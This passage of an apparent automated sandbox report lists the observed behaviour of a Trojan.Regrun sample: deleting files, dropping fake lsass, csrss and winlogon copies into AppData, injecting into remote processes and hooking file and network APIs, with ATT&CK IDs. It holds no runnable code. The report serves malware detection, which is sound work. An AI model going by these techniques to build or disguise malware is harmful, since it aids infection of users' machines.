\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "18/22 Antivirus vendors marked dropped file \"services.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"lsass.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"IExplorer.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"winlogon.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"smss.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"D3_08.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"csrss.exe\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"LSASS.EXE\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"SMSS.EXE\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"SERVICES.EXE\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"WINLOGON.EXE\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)\n 18/22 Antivirus vendors marked dropped file \"CSRSS.EXE\" as malicious (classified as \"Trojan.Regrun\" with 81% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"K:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"L:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"M:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"N:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"O:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"P:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"Q:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"R:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"S:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"T:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"U:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"V:\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" (UID: 00000000-00005080)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005160)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004880)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004596)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005356)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005072)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005152)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004420)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005452)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005364)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003360)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005752)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005544)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005728)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005716)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005780)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005560)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005524)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005608)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005532)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005644)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004316)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005956)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004192)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004320)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003964)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006104)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005256)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005312)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005224)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006108)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004184)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004344)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001288)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002308)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001384)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003984)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004156)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003308)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003224)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001904)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004400)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005268)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003320)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005472)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005024)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003208)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003604)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006092)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006116)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003408)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003936)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005064)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" allocated memory in \"C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 612)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 612)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 612)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 580)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 580)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 580)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 344)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 344)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 344)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 428)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005072)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005152)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004420)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005452)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003360)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005756)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005716)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005780)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005560)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005524)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005608)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004316)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004192)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004320)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006104)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005256)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005312)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006108)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004184)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004344)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002308)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003984)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004156)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003308)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003224)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001904)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004400)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003320)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005472)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005024)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003208)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003604)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006092)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006116)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003408)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003936)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005064)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003972)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001504)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004200)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003928)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214
https://hybrid-analysis.com/sample/82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214
Hybrid Analysis - Killers
